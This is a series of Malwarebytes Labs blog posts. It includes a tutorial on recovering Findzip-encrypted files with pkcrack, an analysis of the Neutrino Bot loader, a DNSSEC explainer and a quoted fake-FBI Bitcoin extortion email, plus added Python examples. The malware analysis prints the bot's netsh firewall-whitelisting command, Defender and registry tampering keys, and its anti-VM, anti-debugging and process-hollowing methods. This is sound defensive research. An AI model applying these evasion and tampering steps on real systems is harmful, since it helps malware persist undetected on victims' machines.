Second, you’ll either need Apple’s Xcode development environment or a good text editor. Xcode is a rather large download that most people will never use in any way, so unless you have a reason to have Xcode, I recommend downloading TextWrangler. It’s an excellent text editor with many possible uses.

Next, you need to install the Xcode command-line tools, which fortunately does not require actually installing Xcode. If you don’t have a copy of Xcode already, open the Terminal app, which is found in the Utilities folder in the Applications folder.

In the Terminal, enter the following command:

xcode-select --install

When you do, you’ll see the following window:

Click the Install button to install the command-line tools, agree to the license, and then wait for the download and install process to complete.

Fourth, you’ll need to download the pkcrack source code. Some people, at this point, might be a little skittish about downloading something like this, for good reason, but I’ve tried it out myself and it works well.

Finally, you will need one of the files that got encrypted in both encrypted and unencrypted form. The file needs to be exactly the same as one that got encrypted. This could be a document that had been attached to an e-mail message that you had saved, but could still retrieve from the e-mail server, or a document that you had stored on a flash drive or other external storage. Make sure the document isn’t too large or too small. Something larger than 1000 bytes, but not thousands of times larger, would be ideal.

If you can’t find such a file, you may be able to use the malicious Findzip app against itself. If you ran the app from somewhere in your user folder – like your Downloads folder – then the app will have (amusingly) encrypted itself. In this case, you can simply download a fresh copy of the app.

Control-click the fresh app and choose Show Package Contents from the contextual menu that appears. Be careful not to open the app! In the window that opens, there will be a Contents folder. Inside that is a file named Info.plist, which will be perfect for our purposes. Grab a copy of that file.

Next, on the encrypted system, find the remnants of that app and do the same thing. In this case, the Info.plist file will have been replaced with an encrypted file named Info.plist.crypt.

The rest of these instructions will involve using these Info.plist and Info.plist.crypt files, but any other pair of matching encrypted and unencrypted files will do just fine.

Compiling pkcrack

In order to use pkcrack, which will allow you to execute what is called a “known plaintext attack” against the encrypted file, you will need to compile it from the source code. The pkcrack source code you downloaded earlier should decompress into this:

The files in the src directory are the ones you’ll be interested in.

Unfortunately, as is, this code won’t compile on macOS. Fortunately, there are some very simple changes you can make to these files to fix that. Time to break out either Xcode or TextWrangler and use that to edit several of these files.

First, open the file named Makefile. There will be a line near the top of the file reading:

CFLAGS=-O6 -Wall

Change the 6 to a 2, so that line looks like this:

CFLAGS=-O2 -Wall

Then save and close the file.

Next, you’ll need to open the exfunc.c file. Find the line near the top that reads:

#include <malloc.h>

Delete this line, and only this line, then save and close the file.

Now, repeat this procedure, removing exactly that same line from the following files:

extract.c main.c readhead.c zipdecrypt.c

Once you’re done, you’re ready to compile the code. Fortunately, this is quite easy. Open the Terminal app again and type the following, but do not press return:

cd 

You can’t see it, but there’s a space after “cd”, so be sure to put that space there.

Next, drag the src folder from the pkcrack-1.2.2 folder onto the Terminal window. That will insert the path to that folder into the command. Now switch back to the Terminal and press return. This changes the current working directory in the Terminal to the src folder.

Finally, enter the following command:

make
This will compile the code, echoing a lot of text into the Terminal window that you don’t really need to worry about. As an example, here’s what this looked like on my system, with much of the output omitted in the middle for brevity:

Hyperion:~ thomas$ cd /Users/thomas/Desktop/pkcrack-1.2.2/src
Hyperion:src thomas$ make
gcc -O2 -Wall -c -o crc.o crc.c
crc.c:24:13: warning: unused variable 'RCSID' [-Wunused-variable]
static char RCSID[]="$Id: crc.c,v 1.3 1997/09/18 18:07:24 lucifer Releas...
            ^
1 warning generated.
[...]
makekey.c:19:13: warning: unused variable 'RCSID' [-Wunused-variable]
static char RCSID[]="$Id: makekey.c,v 1.1 1997/02/15 09:44:44 lucifer Re...
            ^
3 warnings generated.
gcc -o makekey -O2 -Wall makekey.o crc.o keystuff.o
Hyperion:src thomas$

There’s no need to worry about the warnings. You’ll know the build was successful if you now see the following files in the src folder:

extract findkey makekey pkcrack zipdecrypt

These are Unix executable files, also called “binaries.” For ease of use, move these files into a separate folder. I put them into a “bin” folder as shown here:

Finding the keys

The next step will involve using that pair of encrypted and unencrypted files obtained earlier to find three keys. For this example, we’ll use the Info.plist.crypt and Info.plist files referred to previously. Move those files into the bin folder, alongside the pkcrack binaries. Then rename the original, unencrypted file to something else; in this example, we’ll use Info_orig.plist.

Next, back in the Terminal, use the “cd” command again to change to the bin directory. Then, enter the following command:

./extract -p Info.plist.crypt Info.plist

This will produce a file called Info.plist, but its contents are still encrypted. Rename this file to something else, such as Info_enc.plist. (Of course, replace these names with the correct names for the file you’re working with, if you’re not using this Info.plist file.)

If the filenames you’re working with have spaces in them, you’ll need to enclose them in quotes. For example:

./extract -p "Some Word file.docx.crypt" "Some Word file.docx"

Now you’re ready to start searching for the keys. Enter the following command:

./pkcrack -c Info_enc.plist -p Info_orig.plist

(Again, be sure to use quotes around any filenames that contain spaces.)

The pkcrack app will start working on the encrypted file. Depending on the file, it could take a while, but for the Info.plist file in this example, and on my high-end MacBook Pro, it took less than a minute.

You’ll know it’s done when it beeps twice, and the Terminal is displaying something like this:

Hyperion:bin thomas$ ./pkcrack -c Info_enc.plist -p Info_orig.plist
Files read. Starting stage 1 on Sat Feb 25 08:05:04 2017
Generating 1st generation of possible key2_1544 values...done.
Found 4194304 possible key2-values.
Now we're trying to reduce these...
Done. Left with 2941 possible Values. bestOffset is 24.
Stage 1 completed. Starting stage 2 on Sat Feb 25 08:05:11 2017
Ta-daaaaa! key0=c054acf9, key1=d1656d7b, key2=3549626f
Probabilistic test succeeded for 1525 bytes.
Ta-daaaaa! key0=c054acf9, key1=d1656d7b, key2=3549626f
Probabilistic test succeeded for 1525 bytes.
Searching... 11.2%

At this point, pkcrack already has the keys and is trying to recover the actual passcode from them by brute force. That will not succeed, because of the length of the passcode used by the malware. You can force it to cancel and quit by pressing control-C.

Fortunately, you don’t need the passcode: the three keys it found are the cipher’s internal state after the passcode has been mixed in, and they can be used to decrypt all the other encrypted files. Make a note of those three keys, labeled key0, key1, and key2.

Decrypting the files

At this point, we can decrypt the Info.plist.crypt file, as well as any other files encrypted by the malware on that particular Mac. Enter the following command:

./zipdecrypt c054acf9 d1656d7b 3549626f Info.plist.crypt

Be sure to replace the keys in this command with the ones obtained from your encrypted file, in order.

The result of this command will be the creation of a new, unencrypted file. Double-clicking this file will unzip it. The zip file will contain a series of nested folders, starting with “Users” and going through the entire path that the file was originally found in. Dig down into each subsequent folder until you reach the original, now unencrypted, file.

Of course, you already had the original file, in this case. However, you can now repeat this zipdecrypt command with any other encrypted files, using the same keys. Recovering a large number of files in this manner will be tedious, but on the positive side, you can use that time to contemplate how this could have been avoided by having a good set of backups!
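To make clear why three 32-bit values are enough to decrypt every file without ever learning the passcode, here is the PKWARE "traditional" zip cipher (ZipCrypto) written out in Python. This is an added example, not code from the post or from pkcrack: key0/key1/key2 are simply the cipher state after the password has been absorbed, and every member of an archive is encrypted starting from that same state, which is exactly what zipdecrypt exploits. The password, file names and file contents in it are constructed for the demo and have nothing to do with Findzip’s real key material.

```python
"""ZipCrypto (PKWARE traditional encryption) in pure Python.

Added example, not the post's or pkcrack's code. Shows that (key0, key1, key2)
is the whole secret: it is the cipher state after the password, and every
archive member is encrypted from that state, so the keys decrypt everything.
"""
import os
import zlib

# Constants from the PKWARE APPNOTE. Password and file contents further down are
# constructed for this demo and unrelated to Findzip's real key.
INITIAL_KEYS = (0x12345678, 0x23456789, 0x34567890)
LCG_MULT = 134775813
HEADER_LEN = 12


def _crc32_byte(crc, b):
    """One CRC-32 table step, table[(crc ^ b) & 0xff] ^ (crc >> 8), done via zlib."""
    return zlib.crc32(bytes([b]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


def update_keys(keys, b):
    """Advance the key state by one plaintext byte (APPNOTE, section 6.1)."""
    k0, k1, k2 = keys
    k0 = _crc32_byte(k0, b)
    k1 = (k1 + (k0 & 0xFF)) & 0xFFFFFFFF
    k1 = (k1 * LCG_MULT + 1) & 0xFFFFFFFF
    k2 = _crc32_byte(k2, k1 >> 24)
    return (k0, k1, k2)


def keystream_byte(keys):
    """The byte XORed with the next ciphertext byte; it depends on key2 only."""
    t = (keys[2] | 2) & 0xFFFF
    return ((t * (t ^ 1)) >> 8) & 0xFF


def keys_from_password(password):
    """Mix the password into the initial state. This triple is what pkcrack recovers."""
    keys = INITIAL_KEYS
    for b in password:
        keys = update_keys(keys, b)
    return keys


def encrypt_entry(keys, plaintext, header=None):
    """Encrypt one archive member: 12 header bytes, then the data, from state `keys`.

    The last header byte is the high byte of the data CRC, which gives the
    decryptor a cheap (1 in 256) wrong-key check.
    """
    if header is None:
        header = os.urandom(HEADER_LEN - 1) + bytes([(zlib.crc32(plaintext) >> 24) & 0xFF])
    out = bytearray()
    for p in header + plaintext:
        out.append(p ^ keystream_byte(keys))
        keys = update_keys(keys, p)  # the state advances on the PLAINTEXT byte
    return bytes(out)


def decrypt_entry(keys, ciphertext):
    """Decrypt one member from the key state alone (what zipdecrypt does).

    Returns (check_ok, data); check_ok is False when the header check byte does
    not match the CRC of the recovered data, i.e. the keys are probably wrong.
    """
    out = bytearray()
    for c in ciphertext:
        p = c ^ keystream_byte(keys)
        keys = update_keys(keys, p)
        out.append(p)
    header, data = bytes(out[:HEADER_LEN]), bytes(out[HEADER_LEN:])
    check_ok = header[-1] == (zlib.crc32(data) >> 24) & 0xFF
    return check_ok, data


def demo():
    """Encrypt two members under one password, then decrypt using only the keys."""
    password = b"constructed-demo-passphrase-far-too-long-to-brute-force"
    keys = keys_from_password(password)
    members = {  # constructed sample files
        "Users/demo/Downloads/Findzip.app/Contents/Info.plist": b'<?xml version="1.0"?><plist/>',
        "Users/demo/Documents/notes.txt": b"constructed plaintext for the second file",
    }
    encrypted = {name: encrypt_entry(keys, data) for name, data in members.items()}
    # From here on only `keys` is used, never `password`.
    recovered = {name: decrypt_entry(keys, ct) for name, ct in encrypted.items()}
    return all(ok and data == members[name] for name, (ok, data) in recovered.items())


if __name__ == "__main__":
    print("all members recovered from key0/key1/key2 alone:", demo())
```

The check byte is worth knowing about when you run zipdecrypt against many files: with wrong keys the output is still produced, it is just garbage, and one byte in 256 will pass the header check by chance, so verify recovered files by opening them rather than trusting the tool’s silence.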

The post Decrypting after a Findzip ransomware infection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Feb 20th – Feb 27th)

Malwarebytes - Mon, 02/27/2017 - 21:00

Last week in the world of security, we had rogue chrome extensions teaming up with tech support scams, tips on how to stay safe during tax season, advice on locking down your social media profiles, and what to do in the aftermath of a cyberattack. We also teamed up with Cybersecurity Factory, recapped our time at the recent RSA Conference, and took a look at a typo-laden fake FBI mail.

Elsewhere from last week:

The post A week in security (Feb 20th – Feb 27th) appeared first on Malwarebytes Labs.


New Neutrino Bot comes in a protective loader

Malwarebytes - Mon, 02/27/2017 - 19:30

Co-authored by Hasherezade and Jérôme Segura.

In this blog post we will cover a recent version of the multi-purpose Neutrino Bot (AKA Kasidet) which ironically was distributed by an exploit kit of the same name. Earlier in January this year, we had described Neutrino Bot that came via spam so we won’t go over those details again, but instead will focus on an interesting loader.

Anti-VM detection is complemented by multiple layers hiding the actual core, which made extraction of the final payload a bit of a challenge.

Distribution method

This sample was collected via a malvertising campaign in the US that leveraged the Neutrino exploit kit. The infection flow starts with a fingerprinting check for virtualization, network traffic capture and antivirus software. If any are found (i.e. not a genuine victim), the infection will not happen. This check is done via heavily obfuscated JavaScript code in the pre-landing pages, rather than within the Flash exploit itself, like it used to in the past.

Once the initial check has passed, the next step is to launch a specially crafted Flash file containing a bunch of exploits for Internet Explorer and the Flash Player (similar to what was described here). The final step is the download and execution of the RC4 encoded payload via wscript.exe to bypass proxies.

The overall infection flow is summarized in the diagram below (click to enlarge):

A script from Maciej Kotowicz was used to extract artifacts from the Flash file.

Analyzed samples

Behavioral analysis

The sample was well protected against being deployed in a controlled environment. When it detects that it is being run in a VM/sandbox it just deletes itself:

If the environment passed the checks, it drops its copy into: %APPDATA%/Y1ViUVZZXQxx/<random_name>.exe  (during tests we observed the following names: abgrcnq.exe, uu.exe):

The folder and the sample are hidden.

Persistence is achieved via the Task Scheduler:

The malware adds and modifies several registry keys. It adds some basic settings, including the installation date:

It modifies some keys in order to remain hidden on the system. The Hidden/SuperHidden settings allow its dropped copy to remain unnoticed by the user. It disables the display of such files by modifying the following registry keys:

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

It also adds itself into the firewall’s whitelist with this command:

cmd.exe " /a /c netsh advfirewall firewall add rule name="Y1ViUVZZXQxx" dir=in action=allow program=[full_executable_path]

Similarly, the path to the malware is added to Windows Defender’s exclusions:

It disables reporting incidents to Microsoft’s cloud service (SpyNet):

HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting

It modifies settings of terminal services, setting MaxDisconnectionTime and MaxIdleTime to 0. Modified keys:

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxDisconnectionTime
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxIdleTime

If the full installation process went successfully, it finally loads the malicious core, and we can see traffic typical of the Neutrino Bot. Below you can see the beacon “enter” and the response “success”, both base64 encoded. The response is sent as a comment in an otherwise blank HTML page, in order to avoid being noticed:

In the next request the bot sends information about itself, and in response the CnC gives it commands to be executed. Requests and responses are also base64 encoded. Example after decoding:




1463020066516169#screenshot#1469100096882000#botkiller#1481642022438251#rate 15#

The first command was to take a screenshot, and indeed, soon after we can see the bot sending a screenshot in JPG format:

From the version number it sends we can conclude that the version of the bot is 5.2 (similar to this campaign).


The first layer is a crypter stub that overwrites the initial PE in memory with the image of the loader. Unpacking it is demonstrated in this video:

The second layer is a loader that prevents the core bot from running in a controlled environment (i.e. on a VM or under a debugger). This element is probably new; we did not observe it in previous campaigns of Neutrino Bot, e.g. the one described here. We found the loader very effective in its protective task: most of the sandboxes and test VMs used during tests failed to provide any useful results.

The final payload had features typical for Neutrino Bot family.

The loader code shows that it is an integral part of the full Neutrino Bot package, not yet another layer added by an independent crypter. Both the payload and the loader are written in C++, use similar functions and contain overlapping strings. This will be demonstrated in detail later in this article. They also have very close compilation timestamps: payload: 2017-02-16 17:15:43, loader: 2017-02-16 17:15:52.

A patched version of the loader, with environment checks disabled can be viewed here.

Loader

Obfuscation techniques

The code inside contains some level of obfuscation. A few strings are visible:

  • Directory name
  • Some functions
  • Registry keys related to Windows security features that are going to be disabled
  • Strings used to add a new scheduled task.

However, that is not all. Most of the strings are decrypted at runtime. Here is an example of loading an encrypted string:

First, the obfuscated string is written to dynamically allocated memory by a dedicated function. Then, it is decrypted using a simple, XOR-based algorithm (every byte is XORed with 1):

def decode(data):
    maxlen = len(data)
    decoded = bytearray()
    for i in range(0, maxlen):
        dec = data[i] ^ 1
        decoded.append(dec)
    return decoded

The same string after decryption:

Most of the API calls are also dynamically resolved. Example:

Tracing API calls helps to understand a program’s functionality. For this reason, the authors of this malware implemented some of the functions without using API calls at all. In the example below you can see GetLastError() reimplemented by reading the LastErrorValue field directly from a low-level structure, the Thread Environment Block (TEB):


In order to prevent from being executed more than once, the loader creates a mutex with a name that is hardcoded in the binary: 1ViUVZZXQxx.

The primary task of the loader is to check the environment, in order to make sure that the execution is not being watched. But, contrary to most malware, the check is not done just once. There is a dedicated thread deployed:

It runs checks in a never ending loop:

If at any time the loader detects, for example, a blacklisted process being started, execution is terminated.

Examples of the checks performed:

1. Enumerates the list of running processes (using the dynamically loaded functions CreateToolhelp32Snapshot, Process32First and Process32Next). It calculates a checksum of each retrieved process name and compares it with the built-in blacklist:

The blacklisted checksums:


Implementation of the function searching blacklisted processes – as we can see, every function is loaded dynamically with the help of a corresponding checksum:

2. Searches for blacklisted modules within the current process (using the dynamically loaded functions CreateToolhelp32Snapshot, Module32First and Module32Next). Similarly, it calculates a checksum of each retrieved module name and compares it with the built-in blacklist.

Checksum calculation algorithm (implementation):

The blacklisted checksums:


3. Checking whether the process is running under a debugger, using IsDebuggerPresent and CheckRemoteDebuggerPresent

4. Detecting single-stepping with the help of time measurement, using GetTickCount – Sleep – GetTickCount

5. Anti-VM check by detecting blacklisted devices, using QueryDosDevice (e.g. VBoxGuest)

6. Searching for and hiding blacklisted windows by their class names, using EnumWindows and GetClassName (e.g. procexpl)

The blacklisted checksums:


In another thread, the malware performs operations related to the bot installation – adding a task to the Windows Scheduler, adding exclusions to the Firewall etc.
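The checksum blacklists above are what an analyst has to turn back into names to know which tools the loader is afraid of. The usual way is to hash a wordlist of analysis-tool names exactly as the sample does and look the results up in its hard-coded list; the script below, an added example that is not Neutrino’s code, does that and also shows the loader’s side of the check. Because the page shows the real checksum routine only as a screenshot, name_checksum is a stand-in (a ROR-13 additive hash, a common choice in loaders) and an assumption; swap in the algorithm lifted from the binary and the rest stays the same. The wordlist and the blacklist values are constructed for the demo.

```python
"""Resolving a process-name checksum blacklist (added example, not Neutrino's code).

`name_checksum` is a stand-in for the sample's real routine, which the page shows
only as a screenshot; replace it with the algorithm recovered from the binary.
"""
MASK32 = 0xFFFFFFFF
ROR_BITS = 13


def ror32(x, n):
    """Rotate a 32-bit value right by n bits."""
    x &= MASK32
    return ((x >> n) | (x << (32 - n))) & MASK32


def name_checksum(name):
    """Stand-in checksum (assumption): h = ror32(h, 13) + byte over the name bytes."""
    h = 0
    for b in name.encode("ascii", "ignore"):
        h = (ror32(h, ROR_BITS) + b) & MASK32
    return h


def candidate_forms(name):
    """Samples normalise case and extensions inconsistently, so try the variants."""
    base = name[:-4] if name.lower().endswith(".exe") else name
    forms = set()
    for stem in (base, base + ".exe"):
        forms.update({stem, stem.lower(), stem.upper()})
    return forms


def build_lookup(candidates, checksum=name_checksum):
    """Map checksum -> set of candidate spellings that produce it."""
    lookup = {}
    for name in candidates:
        for form in candidate_forms(name):
            lookup.setdefault(checksum(form), set()).add(form)
    return lookup


def resolve_blacklist(blacklist, candidates, checksum=name_checksum):
    """Analyst's side: {checksum: [names]} for every blacklisted value we can explain."""
    lookup = build_lookup(candidates, checksum)
    return {h: sorted(lookup[h]) for h in blacklist if h in lookup}


def flag_processes(running, blacklist, checksum=name_checksum):
    """Loader's side: which running process names hit the hard-coded list."""
    return [p for p in running if checksum(p) in blacklist]


# Constructed wordlist of tools a loader like this one typically looks for.
ANALYSIS_TOOLS = [
    "procexp.exe", "procmon.exe", "wireshark.exe", "ollydbg.exe", "x32dbg.exe",
    "x64dbg.exe", "idaq.exe", "vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe",
]


def demo():
    # Constructed blacklist: the values a sample would store instead of the names.
    blacklist = {name_checksum(n) for n in ("procexp.exe", "WIRESHARK.EXE", "vmtoolsd")}
    resolved = resolve_blacklist(blacklist, ANALYSIS_TOOLS)
    flagged = flag_processes(["explorer.exe", "procexp.exe", "svchost.exe"], blacklist)
    return resolved, flagged


if __name__ == "__main__":
    resolved, flagged = demo()
    for h, names in sorted(resolved.items()):
        print(f"{h:08x} -> {', '.join(names)}")
    print("flagged:", flagged)
```

Any blacklist value that stays unresolved after a decent wordlist is usually a spelling you did not try (a window class name rather than an executable, a localized name, or a name without its extension), which is why the lookup keeps every variant that produced a hit rather than the first one.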

Finally, it unpacks the final payload and runs it using the RunPE method (process hollowing). First, it creates another instance of itself:

Then, it maps a new PE file into that process in place of the original image:


The loaded payload is a Neutrino Bot, with very similar features to the one that we described in a previous post. We can also find elements shared with the loader, for example matching strings:


Neutrino Bot has been on the market for a few years. It is rich in features but its internal structure was never impressive. This time also, the malware authors did not make any significant improvements to the main bot’s structure. However, they added one more protection layer which is very scrupulous in its task of fingerprinting the environment and not allowing the bot to be discovered.

The post New Neutrino Bot comes in a protective loader appeared first on Malwarebytes Labs.


DNSSEC: why do we need it?

Malwarebytes - Mon, 02/27/2017 - 18:00

DNSSEC is short for Domain Name System Security Extensions. It is a set of extensions that add extra security to the DNS protocol. This is done by enabling the validation of DNS responses, which is specifically effective against DNS spoofing attacks. DNSSEC provides the DNS records with a digital signature, so the resolver can check whether the content is authentic and has not been altered on the way.

The reason for this post was the recent SIDN report, which concluded that the state of DNSSEC deployment in the Netherlands leaves a lot to be desired. The banking sector and the ISPs, to name a few, are lagging behind, especially compared to the government sector, which has to be fully compliant by the end of 2017 and currently has 59% of its domain names cryptographically signed.

Background of the report

Only .nl domains were included in the investigation, so companies of a more international nature that might be using other Top Level Domains (TLDs) were not part of the research. Let’s hope that companies of this nature are more advanced in this regard. Of roughly 5.7 million domains in total, 46% were signed.

Additional security

Not only is DNSSEC a security feature by itself, it also provides a trustworthy foundation for other mechanisms that publish policy or key material in DNS, such as:

  • DKIM (DomainKeys Identified Mail)
  • SPF (Sender Policy Framework)
  • DMARC (Domain-based Message Authentication, Reporting and Conformance)
  • DANE (DNS-based Authentication of Named Entities)

Especially DANE, a protocol that allows Transport Layer Security (TLS) certificates to be bound to Domain Name System (DNS) names, is considered a major step forward in security after several certificate authority (CA) providers were breached; in the ordinary CA model any CA can issue a certificate for any domain name. This is why we say that the green padlock is required, but not enough. SPF, DKIM and DMARC work without DNSSEC, but their records can then be spoofed like any other DNS record; DANE depends on DNSSEC validation entirely. Going forward it is important to know that the popular browsers do not validate DNSSEC or DANE by themselves: validation happens in the resolver, and checking DANE in the browser currently requires a plug-in such as the Extended DNSSEC Validator shown below. Once that is in place, this extra security should put a major dent in the possibilities for DNS spoofing.

Extended DNSSEC Validator
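To make the DANE binding concrete, here is the check a DANE-aware client performs once it has the TLSA record for a host: recompute the record’s association data from the certificate the server presented and compare. This is an added example, not code from the post or from the Extended DNSSEC Validator; the field values follow RFC 6698, while the certificate and SubjectPublicKeyInfo bytes are constructed placeholders standing in for DER data that a real client would take from the TLS handshake. The dnssec_validated flag models the dependency the text describes: a TLSA answer that did not validate is worth nothing.

```python
"""Checking a presented TLS certificate against a DANE TLSA record (added example).

Not from the original post. Field semantics per RFC 6698; the "DER" bytes in demo()
are constructed placeholders, a real client feeds in the handshake certificate.
"""
import hashlib
from dataclasses import dataclass

# RFC 6698 field values
USAGE_NAMES = {0: "PKIX-TA", 1: "PKIX-EE", 2: "DANE-TA", 3: "DANE-EE"}
SELECTOR_FULL_CERT, SELECTOR_SPKI = 0, 1
MATCH_EXACT, MATCH_SHA256, MATCH_SHA512 = 0, 1, 2


@dataclass(frozen=True)
class TLSARecord:
    usage: int
    selector: int
    matching_type: int
    data: bytes

    @classmethod
    def from_presentation(cls, text):
        """Parse the zone-file form, e.g. '3 1 1 2bb1...' (hex may be split by spaces)."""
        usage, selector, mtype, *hexparts = text.split()
        return cls(int(usage), int(selector), int(mtype), bytes.fromhex("".join(hexparts)))

    def association_data(self, cert_der, spki_der):
        """Recompute what the record must contain for this certificate."""
        selected = cert_der if self.selector == SELECTOR_FULL_CERT else spki_der
        if self.matching_type == MATCH_EXACT:
            return selected
        if self.matching_type == MATCH_SHA256:
            return hashlib.sha256(selected).digest()
        if self.matching_type == MATCH_SHA512:
            return hashlib.sha512(selected).digest()
        raise ValueError(f"unknown matching type {self.matching_type}")

    def matches(self, cert_der, spki_der):
        return self.association_data(cert_der, spki_der) == self.data


def tlsa_owner_name(host, port, proto="tcp"):
    """Where the record lives in the zone: _port._proto.host."""
    return f"_{port}._{proto}.{host}."


def dane_check(records, cert_der, spki_der, dnssec_validated):
    """Accept the leaf only if a DNSSEC-validated DANE-EE (usage 3) record matches.

    Usage 0/1/2 records additionally need the PKIX chain or the CA certificate,
    which this example does not model; they are reported as unsupported.
    """
    if not dnssec_validated:
        return "reject: TLSA answer was not DNSSEC-validated and cannot be trusted"
    for rec in records:
        if rec.usage == 3 and rec.matches(cert_der, spki_der):
            return "accept: DANE-EE record matches the presented certificate"
    if any(rec.usage != 3 for rec in records):
        return "unsupported: only DANE-EE records are handled here"
    return "reject: no TLSA record matches the presented certificate"


def demo():
    # Constructed stand-ins for DER bytes; real ones come from the TLS handshake.
    spki = b"\x30\x59\x30\x13constructed-spki-bytes"
    cert = b"\x30\x82\x02\x1a" + spki + b"constructed-rest-of-certificate"
    published = TLSARecord(3, SELECTOR_SPKI, MATCH_SHA256, hashlib.sha256(spki).digest())
    zone_text = f"3 1 1 {hashlib.sha256(spki).hexdigest()}"
    assert TLSARecord.from_presentation(zone_text) == published
    return (
        dane_check([published], cert, spki, dnssec_validated=True),
        dane_check([published], cert, spki, dnssec_validated=False),
        dane_check([published], cert + b"x", spki + b"x", dnssec_validated=True),
    )


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The "3 1 1" form (DANE-EE, SPKI, SHA-256) is the one most operators publish, because it survives certificate renewals as long as the key pair is kept; the third result in demo() is what a fraudulently issued certificate with a different key looks like to a DANE client, even though a CA-based check would show the green padlock.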

Major conclusions of the report

Personally I was surprised, almost shocked, to find out that only 6% of the banking sites had their domains signed, the worst of all the investigated groups of domains. Especially worrying as the move from physical to on-line banking has been progressing steadily in recent times. The percentage for all financial corporations was at 16%. Other sectors where we would expect better figures:

  • ISPs (Internet Service Providers) 22%
  • Stock exchange listed companies 12%
  • Internet shops 30%
  • Telecom providers 33% and worst of all, of the 4 biggest providers with an .nl domain, none contributed to that score.

As stated before, the only group scoring somewhat satisfactorily were government sites at 59%, with the remark that they are being forced to comply by the end of this year (2017).

So, even though the number of signed domain names has grown considerably over the past two and a half years (since the previous report on this subject), some sectors are lagging far behind, and in particular some sectors where we would hope and expect otherwise.

Your country

If you have any similar figures about these numbers in your country, let me know in the comments. I would like to make some comparisons.


Pieter Arntz

The post DNSSEC: why do we need it? appeared first on Malwarebytes Labs.


Fake FBI mail: “Send us $112 or we’ll lock your iCloud account”

Malwarebytes - Fri, 02/24/2017 - 20:12

Here’s a scam mail which claims your iCloud has been accessed without permission, and will be locked within 2 hours if you don’t verify the account by sending $112 to a Bitcoin address.

The missive claims to be from and is titled, “Virus Warning: E-Mail from ‘FBI Alert”.

As you might expect, it’s rather all over the place, lurching from random mentions of virus warnings and fraudulent access, to a cavalcade of typo-ridden howlers:

Virus Warning: E-mail from ‘FBI Alert’

Apple has detected an unauthorized sign-in to your iClodu [sic] account.

Please verify your account by sending 112$ to this Bitcoin address:

If no response is received your account will be locked for security.

The server will lock yor [sic] account within 2 hours if we don’t receive the payment!

We are working to create a world where privacy is the norm, end-to-end encryption is the standard, and security and usability are synonymous.

FBI and iCloud is selling a tool for iCloud protection against hackers and scammers this tool costs only 112$

the license for our tool is 360 days

if you are not familiar with bitcoin you can buy it from here:


After we confirm the payment, we send the private key so you can unlock your email and download our tool

FBI SECURIRY [sic] iCloud and Apple Protection

Well, if you want to secure your iCloud I guess the right people for the job are definitely FBI Security…maybe?

The email definitely goes right off the rails at the end with random mentions of a “tool” designed to protect your iCloud from hackers, which also just happens to cost the same amount as the supposed verification fee. This is most definitely the “throw it all at a wall, see what sticks” approach but I’m not convinced it’ll be as successful as the scammers would like it to be. Should you receive any missives from the “FBI” regarding the safety of your iCloud account, feel free to send it to the trash. Elsewhere, you can visit the Apple website and find out everything you need to know about locking down your iCloud.


Christopher Boyd (Thanks Steven)

The post Fake FBI mail: “Send us $112 or we’ll lock your iCloud account” appeared first on Malwarebytes Labs.


Who else crushed it at RSA?

Malwarebytes - Fri, 02/24/2017 - 18:00

The theme for this year’s RSA Conference was the “Power of OpportUNITY”, and with more than 43,000 IT and security professionals in attendance—it truly was the gathering to bring our community together.

Malwarebytes was proud to once again take part in this spectacular week-long event. Thousands of customers, new businesses, students, press, and industry analysts made their way to our new booth to catch our giant threat theater presentation, see a demo, grab a new collectible T-shirt, and say “Hi” to our robot (who was officially named ZERO).

While at the booth, visitors shared with us the security challenges and pain they’re experiencing. Overwhelmingly, threats including zero-day exploits, malware, and ransomware are continuing to get through their existing defenses and perimeters. Businesses from around the country across every industry are all looking for better threat detection capabilities and ways to reduce their response times for incidents. This made for a great opportunity to explain how Malwarebytes technologies can address these shared needs.


But the week wasn’t just about security… the galleries at the recently remodeled San Francisco Museum of Modern Art were the perfect backdrop for our CRUSH PARTY on Valentine’s Day. Filled to capacity, guests fell in love with the perfect palette of music, food, and great art.


Mark your calendars now for RSA’s 27th annual conference, being held April 16-20, 2018 in San Francisco. ZERO and the rest of us Malwarenauts will be there, and we hope you’ll join us too!

Can’t wait till then? Check out our Events page to see where else we’re popping up this year.

The post Who else crushed it at RSA? appeared first on Malwarebytes Labs.


